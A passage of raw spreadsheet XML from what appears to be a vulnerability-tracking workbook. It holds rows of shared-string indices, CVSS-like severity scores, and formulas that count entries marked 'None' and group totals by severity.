    </row>
    <row r="594" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A594" s="3" t="s">
        <v>780</v>
      </c>
      <c r="B594" s="4" t="s">
        <v>3311</v>
      </c>
      <c r="C594" s="4" t="s">
        <v>3312</v>
      </c>
      <c r="D594" s="4" t="s">
        <v>998</v>
      </c>
      <c r="E594" s="4" t="s">
        <v>999</v>
      </c>
      <c r="F594" s="4" t="s">
        <v>3313</v>
      </c>
      <c r="G594" s="4" t="s">
        <v>3314</v>
      </c>
      <c r="H594" s="4">
        <v>5.3</v>
      </c>
      <c r="I594" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J594" s="4"/>
      <c r="K594" s="4"/>
      <c r="L594" s="4">
        <f>IF(out!$G594="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M594" s="4"/>
      <c r="N594" s="4"/>
      <c r="O594" s="13"/>
      <c r="P594" s="4"/>
      <c r="Q594" s="13">
        <f>HOUR(out!$P594 -out!$N594)</f>
        <v>0</v>
      </c>
      <c r="R594" s="18"/>
      <c r="S594" s="4"/>
      <c r="T594" s="4"/>
      <c r="U594" s="4"/>
      <c r="V594" s="7"/>
    </row>
    <row r="595" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A595" s="3" t="s">
        <v>3315</v>
      </c>
      <c r="B595" s="4" t="s">
        <v>3316</v>
      </c>
      <c r="C595" s="4" t="s">
        <v>3317</v>
      </c>
      <c r="D595" s="4" t="s">
        <v>3318</v>
      </c>
      <c r="E595" s="4" t="s">
        <v>3319</v>
      </c>
      <c r="F595" s="4" t="s">
        <v>661</v>
      </c>
      <c r="G595" s="4" t="s">
        <v>662</v>
      </c>
      <c r="H595" s="4">
        <v>8.6</v>
      </c>
      <c r="I595" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J595" s="4"/>
      <c r="K595" s="4"/>
      <c r="L595" s="4">
        <f>IF(out!$G595="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M595" s="4"/>
      <c r="N595" s="4"/>
      <c r="O595" s="13"/>
      <c r="P595" s="4"/>
      <c r="Q595" s="13">
        <f>HOUR(out!$P595 -out!$N595)</f>
        <v>0</v>
      </c>
      <c r="R595" s="18"/>
      <c r="S595" s="4"/>
      <c r="T595" s="4"/>
      <c r="U595" s="4"/>
      <c r="V595" s="7"/>
    </row>
    <row r="596" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A596" s="3" t="s">
        <v>3320</v>
      </c>
      <c r="B596" s="4" t="s">
        <v>3321</v>
      </c>
      <c r="C596" s="4" t="s">
        <v>3322</v>
      </c>
      <c r="D596" s="4" t="s">
        <v>1459</v>
      </c>
      <c r="E596" s="4" t="s">
        <v>1460</v>
      </c>
      <c r="F596" s="4" t="s">
        <v>2664</v>
      </c>
      <c r="G596" s="4" t="s">
        <v>2665</v>
      </c>
      <c r="H596" s="4">
        <v>6.5</v>
      </c>
      <c r="I596" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J596" s="4"/>
      <c r="K596" s="4"/>
      <c r="L596" s="4">
        <f>IF(out!$G596="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M596" s="4"/>
      <c r="N596" s="4"/>
      <c r="O596" s="13"/>
      <c r="P596" s="4"/>
      <c r="Q596" s="13">
        <f>HOUR(out!$P596 -out!$N596)</f>
        <v>0</v>
      </c>
      <c r="R596" s="18"/>
      <c r="S596" s="4"/>
      <c r="T596" s="4"/>
      <c r="U596" s="4"/>
      <c r="V596" s="7"/>
    </row>
    <row r="597" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A597" s="3" t="s">
        <v>2857</v>
      </c>
      <c r="B597" s="4" t="s">
        <v>3323</v>
      </c>
      <c r="C597" s="4" t="s">
        <v>3324</v>
      </c>
      <c r="D597" s="4" t="s">
        <v>3325</v>
      </c>
      <c r="E597" s="4" t="s">
        <v>3326</v>
      </c>
      <c r="F597" s="4" t="s">
        <v>3327</v>
      </c>
      <c r="G597" s="4" t="s">
        <v>3328</v>
      </c>
      <c r="H597" s="4">
        <v>4.8</v>
      </c>
      <c r="I597" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J597" s="4"/>
      <c r="K597" s="4"/>
      <c r="L597" s="4">
        <f>IF(out!$G597="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M597" s="4"/>
      <c r="N597" s="4"/>
      <c r="O597" s="13"/>
      <c r="P597" s="4"/>
      <c r="Q597" s="13">
        <f>HOUR(out!$P597 -out!$N597)</f>
        <v>0</v>
      </c>
      <c r="R597" s="18"/>
      <c r="S597" s="4"/>
      <c r="T597" s="4"/>
      <c r="U597" s="4"/>
      <c r="V597" s="7"/>
    </row>
    <row r="598" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A598" s="3" t="s">
        <v>3329</v>
      </c>
      <c r="B598" s="4" t="s">
        <v>3330</v>
      </c>
      <c r="C598" s="4" t="s">
        <v>3331</v>
      </c>
      <c r="D598" s="4" t="s">
        <v>3244</v>
      </c>
      <c r="E598" s="4" t="s">
        <v>3245</v>
      </c>
      <c r="F598" s="4" t="s">
        <v>568</v>
      </c>
      <c r="G598" s="4" t="s">
        <v>569</v>
      </c>
      <c r="H598" s="4">
        <v>6.5</v>
      </c>
      <c r="I598" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J598" s="4"/>
      <c r="K598" s="4"/>
      <c r="L598" s="4">
        <f>IF(out!$G598="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M598" s="4"/>
      <c r="N598" s="4"/>
      <c r="O598" s="13"/>
      <c r="P598" s="4"/>
      <c r="Q598" s="13">
        <f>HOUR(out!$P598 -out!$N598)</f>
        <v>0</v>
      </c>
      <c r="R598" s="18"/>
      <c r="S598" s="4"/>
      <c r="T598" s="4"/>
      <c r="U598" s="4"/>
      <c r="V598" s="7"/>
    </row>
    <row r="599" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A599" s="3" t="s">
        <v>3332</v>
      </c>
      <c r="B599" s="4" t="s">
        <v>3333</v>
      </c>
      <c r="C599" s="4" t="s">
        <v>3334</v>
      </c>
      <c r="D599" s="4" t="s">
        <v>3335</v>
      </c>
      <c r="E599" s="4" t="s">
        <v>3336</v>
      </c>
      <c r="F599" s="4" t="s">
        <v>3337</v>
      </c>
      <c r="G599" s="4" t="s">
        <v>3338</v>
      </c>
      <c r="H599" s="4">
        <v>6.5</v>
      </c>
      <c r="I599" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J599" s="4"/>
      <c r="K599" s="4"/>
      <c r="L599" s="4">
        <f>IF(out!$G599="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M599" s="4"/>
      <c r="N599" s="4"/>
      <c r="O599" s="13"/>
      <c r="P599" s="4"/>
      <c r="Q599" s="13">
        <f>HOUR(out!$P599 -out!$N599)</f>
        <v>0</v>
      </c>
      <c r="R599" s="18"/>
      <c r="S599" s="4"/>
      <c r="T599" s="4"/>
      <c r="U599" s="4"/>
      <c r="V599" s="7"/>
    </row>
    <row r="600" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A600" s="3" t="s">
        <v>3339</v>
      </c>
      <c r="B600" s="4" t="s">
        <v>3340</v>
      </c>
      <c r="C600" s="4" t="s">
        <v>3341</v>
      </c>
      <c r="D600" s="4" t="s">
        <v>3342</v>
      </c>
      <c r="E600" s="4" t="s">
        <v>3343</v>
      </c>
      <c r="F600" s="4" t="s">
        <v>3344</v>
      </c>
      <c r="G600" s="4" t="s">
        <v>3345</v>
      </c>
      <c r="H600" s="4">
        <v>6.5</v>
      </c>
      <c r="I600" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J600" s="4"/>
      <c r="K600" s="4"/>
      <c r="L600" s="4">
        <f>IF(out!$G600="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M600" s="4"/>
      <c r="N600" s="4"/>
      <c r="O600" s="13"/>
      <c r="P600" s="4"/>
      <c r="Q600" s="13">
        <f>HOUR(out!$P600 -out!$N600)</f>
        <v>0</v>
      </c>
      <c r="R600" s="18"/>
      <c r="S600" s="4"/>
      <c r="T600" s="4"/>
      <c r="U600" s="4"/>
      <c r="V600" s="7"/>
    </row>
    <row r="601" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A601" s="3" t="s">
        <v>2857</v>
      </c>
      <c r="B601" s="4" t="s">
        <v>3346</v>
      </c>
      <c r="C601" s="4" t="s">
        <v>3347</v>
      </c>
      <c r="D601" s="4" t="s">
        <v>3348</v>
      </c>
      <c r="E601" s="4" t="s">
        <v>3349</v>
      </c>
      <c r="F601" s="4" t="s">
        <v>3168</v>
      </c>
      <c r="G601" s="4" t="s">
        <v>3169</v>
      </c>
      <c r="H601" s="4">
        <v>5.3</v>
      </c>
      <c r="I601" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J601" s="4"/>
      <c r="K601" s="4"/>
      <c r="L601" s="4">
        <f>IF(out!$G601="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M601" s="4"/>
      <c r="N601" s="4"/>
      <c r="O601" s="13"/>
      <c r="P601" s="4"/>
      <c r="Q601" s="13">
        <f>HOUR(out!$P601 -out!$N601)</f>
        <v>0</v>
      </c>
      <c r="R601" s="18"/>
      <c r="S601" s="4"/>
      <c r="T601" s="4"/>
      <c r="U601" s="4"/>
      <c r="V601" s="7"/>
    </row>
    <row r="602" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A602" s="3" t="s">
        <v>2857</v>
      </c>
      <c r="B602" s="4" t="s">
        <v>3350</v>
      </c>
      <c r="C602" s="4" t="s">
        <v>3351</v>
      </c>
      <c r="D602" s="4" t="s">
        <v>3352</v>
      </c>
      <c r="E602" s="4" t="s">
        <v>3353</v>
      </c>
      <c r="F602" s="4" t="s">
        <v>3354</v>
      </c>
      <c r="G602" s="4" t="s">
        <v>3355</v>
      </c>
      <c r="H602" s="4">
        <v>4.8</v>
      </c>
      <c r="I602" s="4" t="s">
        <v>40</v>
      </c>
      <c r="J602" s="4"/>
      <c r="K602" s="4"/>
      <c r="L602" s="4">
        <f>IF(out!$G602="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M602" s="4"/>
      <c r="N602" s="4"/>
      <c r="O602" s="13"/>
      <c r="P602" s="4"/>
      <c r="Q602" s="13">
        <f>HOUR(out!$P602 -out!$N602)</f>
        <v>0</v>
      </c>
      <c r="R602" s="18"/>
      <c r="S602" s="4"/>
      <c r="T602" s="4"/>
      <c r="U602" s="4"/>
      <c r="V602" s="7"/>
    </row>
    <row r="603" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A603" s="3" t="s">
        <v>3356</v>
      </c>
      <c r="B603" s="4" t="s">
        <v>3357</v>
      </c>
      <c r="C603" s="4" t="s">
        <v>3358</v>
      </c>
      <c r="D603" s="4" t="s">
        <v>3359</v>
      </c>
      <c r="E603" s="4" t="s">
        <v>3360</v>
      </c>
      <c r="F603" s="4" t="s">
        <v>3361</v>
      </c>
      <c r="G603" s="4" t="s">
        <v>2562</v>
      </c>
      <c r="H603" s="4">
        <v>8.1999999999999993</v>
      </c>
      <c r="I603" s="4" t="s">
        <v>25</v>
      </c>
      <c r="J603" s="4"/>
      <c r="K603" s="4"/>
      <c r="L603" s="4">
        <f>IF(out!$G603="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M603" s="4"/>
      <c r="N603" s="4"/>
      <c r="O603" s="13"/>
      <c r="P603" s="4"/>
      <c r="Q603" s="13">
        <f>HOUR(out!$P603 -out!$N603)</f>
        <v>0</v>
      </c>
      <c r="R603" s="18"/>
      <c r="S603" s="4"/>
      <c r="T603" s="4"/>
      <c r="U603" s="4"/>
      <c r="V603" s="7"/>
    </row>
    <row r="604" spans="1:22" ht="10" customHeight="1" x14ac:dyDescent="0.2">
      <c r="A604" s="9" t="s">
        <v>3362</v>
      </c>
      <c r="B604" s="10" t="s">
        <v>3363</v>
      </c>
      <c r="C604" s="10" t="s">
        <v>3364</v>
      </c>
      <c r="D604" s="10" t="s">
        <v>3365</v>
      </c>
      <c r="E604" s="10" t="s">
        <v>3366</v>
      </c>
      <c r="F604" s="10" t="s">
        <v>3367</v>
      </c>
      <c r="G604" s="10" t="s">
        <v>3368</v>
      </c>
      <c r="H604" s="10">
        <v>6.5</v>
      </c>
      <c r="I604" s="10" t="s">
        <v>40</v>
      </c>
      <c r="J604" s="10"/>
      <c r="K604" s="10"/>
      <c r="L604" s="10">
        <f>IF(out!$G604="None",1,0)</f>
        <v>0</v>
      </c>
      <c r="M604" s="10"/>
      <c r="N604" s="10"/>
      <c r="O604" s="15"/>
      <c r="P604" s="10"/>
      <c r="Q604" s="15">
        <f>HOUR(out!$P604 -out!$N604)</f>
        <v>0</v>
      </c>
      <c r="R604" s="19"/>
      <c r="S604" s="10"/>
      <c r="T604" s="10"/>
      <c r="U604" s="10"/>
      <c r="V604" s="11"/>
    </row>
    <row r="606" spans="1:22" x14ac:dyDescent="0.2">
      <c r="R606" s="20">
        <f>AVERAGE(R2:R53)</f>
        <v>50.057692307692307</v>
      </c>
    </row>
    <row r="607" spans="1:22" x14ac:dyDescent="0.2">
      <c r="A607" t="s">
        <v>3369</v>
      </c>
      <c r="B607">
        <v>603</v>
      </c>
      <c r="R607" s="20">
        <f>MAX(R2:R53)</f>
        <v>120</v>
      </c>
    </row>
    <row r="608" spans="1:22" x14ac:dyDescent="0.2">
      <c r="A608" t="s">
        <v>3371</v>
      </c>
      <c r="B608">
        <f>COUNTIF(G2:G604, "None")</f>
        <v>322</v>
      </c>
      <c r="R608" s="20">
        <f>MIN(R2:R53)</f>
        <v>5</v>
      </c>
    </row>
    <row r="609" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A609" t="s">
        <v>3370</v>
      </c>
      <c r="B609">
        <f>B607-B608</f>
        <v>281</v>
      </c>
    </row>
    <row r="610" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A610" t="s">
        <v>25</v>
      </c>
      <c r="B610">
        <f>COUNTIFS(out!$I$2:$I$604,A610, out!$L$2:$L$604,1)</f>
        <v>238</v>
      </c>
    </row>
    <row r="611" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A611" t="s">
        <v>40</v>
      </c>
      <c r="B611">
        <f>COUNTIFS(out!$I$2:$I$604,A611, out!$L$2:$L$604,1)</f>
        <v>68</v>
      </c>
    </row>
    <row r="612" spans="1:2" x14ac:dyDescent="0.2">
      <c r="A612" t="s">
        <v>71</v>
      </c>
      <c r="B612">
        <f>COUNTIFS(out!$I$2:$I$604,A612, out!$L$2:$L$604,1)</f>
        <v>5</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2018-07-03T18:24:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-07-03T18:24:16Z</dcterms:modified>
</cp:coreProperties>
</file>